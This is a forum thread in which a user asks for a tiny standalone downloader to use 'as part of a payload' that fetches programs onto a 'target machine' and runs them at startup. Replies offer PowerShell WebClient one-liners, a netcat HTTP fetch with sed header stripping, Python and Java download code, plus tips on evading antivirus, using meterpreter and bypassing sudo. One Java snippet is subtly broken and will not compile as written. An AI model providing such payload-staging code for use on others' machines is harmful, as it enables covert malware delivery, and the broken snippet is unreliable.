Jump to content

Recommended Posts

Posted

Looking for an minimal FTP or WGET type program that I can use as part of a payload.

Just has to really simple and very small program. No command line arguments or GUI needed just code in the URL of the file you want to get.

Doesn't require outside libraries ie curl, boost, .NET, so it is a standalone program that will run on most machines.

Just need to get a few files from the internet and and save them to a specific location on the target machine.

Basically want to download the programs to the machine and run them on startup. Seems like all of the "simple" programs that will do this require a lib that is like 2400 additional files. I'm wondering if I can do this with maybe 1, 2 or 3 files?

If you want to post an example in another language that's cool. Doesn't have to be C. Just easily deployable.

Any thoughts? :ph34r:

Posted

Have you looked at TFTP [Wikipedia entry, RFC]? It's a lot simpler that other file transfer protocols (which will make it slower), but there are plenty of standalone clients about.

Posted

Netcat? Pretty much direct socket plug.

Posted

FTP servers require a login and password by default, so scripting, will probably still be needed unless you pre-load all the info into a bundled executable.

What OS are you using as the target? Most machines have some form of built in FTP clients, but no FTP works without commands other than scripting it to do the login and downloads for you.

You might want to take advantage of things like PowerShell on a windows OS since this will be installed by default on anything later than XP - https://www.google.com/#q=powershell+download+file and

For linux, almost all distros have FTP installed, but you can also use lynx if installed on Linux:

lynx -dump http://somesite.com/file.ext

If using Metasploit and looking for payloads though, just use meterpeter and send the files over using Metasploit itself. Mind you, you want things to stay off disk so they don't get scanned or caught by the target system, so not sure you would want to use tools known to be scanned for that could get you caught, and you can use the OS itself to just do it for you without setting off alarms. What you upload to the target it a whole other ball game and the programs you upload themselves need to pass AV and malware scans.

Posted

FTP servers require a login and password by default

The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

Posted

The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

Anonymous ftp still requires you to enter:

User: anonymous

Pass: anonymous@somesite.com (any email address basically)

Posted

I like the powershell idea. I think doing this on Windows is going to be pretty simple.

Maybe just write out an array of all of the possible networking tools and their possible install locations and loop through until it finds a networking tool that will do the job. I had a heck of a time trying to do this on Ubuntu because it wanted a sudoer password for each system call. The code executes but it needs user interaction. Debian is set up with the root user as default so you can run a bunch of system calls without any extra permissions.

I'm actually really surprised there isn't some kind of downloader payload already available.

This is the simplest example I could come up with thus far. Python.

#!/usr/bin/python

import urllib
urllib.urlretrieve("http://hak5.org/wp-content/uploads/2012/08/hak5-50.png", filename="hak5-50.png")

I suppose I can make that happen py2exe, one of those python compilers.

QB64 has some simple networking features but they currenly only work on Windows. Not that that is a bad thing.

Also anybody know a scripted way to do this with metasploit? I'll probably come up with quite a few ways to do this by the time I'm finished.

Thanks everybody for ideas.

Posted

Jeez. I thought you wanted light weight. Python is a lot of things, but it installs at a few megs minimum.

On a Linux box, try curl or wget which are both downloading tools you can script up the wazoo, are effectively installed everywhere and won't require root access either.

Posted

+1 for sure. A call to to wget might be the easiest way to handle this on a Linux box. Powershell on Windows as someone had suggested. Maybe just system calls.

Coding. Thanks guys.

Posted

I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root.Namely tar was one of them listed that allows you to start up other programs as root(if I read the article correctly) by piping it out in a bash script. Personally I'd prefer something encrypted such as scp or sftp, but to use built in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works.

If you wanted a quick download, there are other ways of downloading in windows with bat and VBS scripting, although powershell would be one way from the command line alone. If you don't specify the whole path in the output part(c:\file.txt) then it saves it to the default user's directory, ie: c:\users\username\file.txt - Power shell one liner:

(new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt')

parenthesis are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a powershell user. I googled for the above example to test myself, which worked and how I found out windows wants a full path for the output or it puts it in the home directory.

I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those.

Posted

I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root.Namely tar was one of them listed that allows you to start up other programs as root(if I read the article correctly) by piping it out in a bash script. Personally I'd prefer something encrypted such as scp or sftp, but to use built in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works.

If you wanted a quick download, there are other ways of downloading in windows with bat and VBS scripting, although powershell would be one way from the command line alone. If you don't specify the whole path in the output part(c:\file.txt) then it saves it to the default user's directory, ie: c:\users\username\file.txt - Power shell one liner:

(new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt')

parenthesis are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a powershell user. I googled for the above example to test myself, which worked and how I found out windows wants a full path for the output or it puts it in the home directory.

I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those.

Gotta love one liners. :cool: These are all really good suggestions.

Posted (edited)

I know someone had already mentioned netcat but

$ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt

EDIT: this will also include the server header information, which will need to be removed. I just forgot about that.

Edited by fugu
Posted

I know someone had already mentioned netcat but

$ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt
EDIT: this will also include the server header information, which will need to be removed. I just forgot about that.

Yeah, I was looking at ways of doing it with telnet logging the output, but as you mentioned, it put all the headers in the file, not to mention messes up the encoding and spacing. netcat adds the headers, but 1, not a native app of any OS, which helps with using built in tools for downloading, and 2, if using external tools, wget would probably be the easiest to use command line tool.

Posted

Well, since you're getting the payload to grab a file off of a server you control, you could modify the server to not include any headers for a specific request and just dump the binary into the socket. Might mess up proxy servers and such though, but if you're running an HTTPS server that problem will be circumvented aswell.

Posted

Ok it was bugging me that I couldn't figure this out, but here is a jacked up way to do it:

$ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 | sed ':a;N;$!ba;s/\r\n\r\n/\x00/' | sed ':a;N;$!ba;s/[^\x00]*\x00//' > ./file.txt

this "should" remove the headers, however as I've read, sed does not always allow the use of ; so on some systems this might not work

Posted

Pipe it through this sed command

sed '1,/^\s*$/d'

HTTP gives you all the headers and such, then an empty line, then the actual contents. This sed statement will drop everything up until and including this empty line.

  • 4 weeks later...
Posted (edited)

I'm trying this Powershell thing on Windows 7.

Powershell (New-Object System.Net.WebClient).DownloadFile('Url', Path)

Sometimes I'm getting an error like:

The file name, directoryname, or volume label syntax is incorrect.

Or I get an overload error.

What am I doing wrong? I've never really used powershell.

Edited by vailixi
Posted
open cmd.exe > powershell (enter)
(new-object System.Net.WebClient).DownloadFile('http://www.ticktockcomputers.com/robots.txt','c:\file.txt')

Is path surrounded with single quotes? Not sure if that makes a different, but I also assume you're being generic, and not using path but instead the full drive path needed. I just downloaded my sites robots.txt file, code exactly like pasted above

Posted

Open wireshark, start capturing, and then try the command. Check wireshark when the error happens, but I'm guessing, it's an issue retrieving the file and you may learn more looking through the traffic to see what happens. To test this, try grabbing a different known file as well, see if it works. If it does it for all files, then maybe some settings in your system, or you need to elevate to admin(although I didn't have to on my system).

Posted

Verify the use of a slash in a path. Chances are you need double-slashes (because the slash might be the escape char for special characters) or alternatively prepent the path with an '@' to indicate there is nothing to escape in there and slashes are just that : slashes. It's something C# does so I wouldn't be surprised if it leaked into the powershell syntax.

Posted (edited)

I was having about zero success with powershell but I did find a nice java snippet that works. I need to include some error code so it doesn't crash if the server comes back 403 or something like that. But it does download and save the file. Not exactly a one liner though.

import java.io.BufferedInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;


public class DownloadFile {

  public static void main(String[] args) throws IOException {
		 
		 String fileName = "filename"; //The file that will be saved on your computer
		 URL link = new URL("url"); //The file that you want to download
		
     //download
		 InputStream in = new BufferedInputStream(link.openStream());
		 ByteArrayOutputStream out = new ByteArrayOutputStream();
		 byte[] buf = new byte[1024];
		 int n = 0;
		 while (-1!=(n=in.read(buf)))
		 {
		    out.write(buf, 0, n);
		 }
		 out.close();
		 in.close();
		 byte[] response = out.toByteArray();
 
		 FileOutputStream fos = new FileOutputStream(fileName);
		 fos.write(response);
		 fos.close();
     //end of download
		 

	}

}
 


Got it here: http://code.runnable.com/Uu83dm5vSScIAACw/download-a-file-from-the-web-for-java-files-and-save

Edited by vailixi
Posted (edited)

Well, we can reduce that quite a bit:

import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class DownloadFile {
  public static void main(String[] args) throws Exception {
    FileOutputStream out = new FileOutputStream(args[0]);
    InputStream in = new URL(args[1]).openStream();
    byte[] buf = new byte[1024];
    do {
       int bytesRead = in.read(buf);
       out.write( buf, 0, bytesRead );
    } while (bytesRead >= 0);
    out.close();
    in.close();
  }
}
Edited by Cooper

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...